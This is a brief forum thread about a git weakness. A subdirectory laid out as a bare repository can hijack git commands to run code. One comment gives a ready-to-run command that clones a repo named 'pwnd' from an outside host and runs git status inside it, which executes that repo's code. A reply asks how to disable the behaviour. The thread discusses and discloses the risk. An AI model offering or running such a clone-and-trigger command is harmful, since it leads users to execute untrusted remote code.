|
|
|
|
|
by tomlx
1085 days ago
|
|
git does not clone hooks, but if a subdirectory of a repo has the structure of a bare repo it can hijack git subcommands for code execution. try: git clone https://git.0x90.space/vmann/pwnd && cd pwnd/whoot && git status
it is a bit crazy this is not disabled by default yet. |
|
> not disabled by default yet
You're saying there's a way to "disable" this behavior?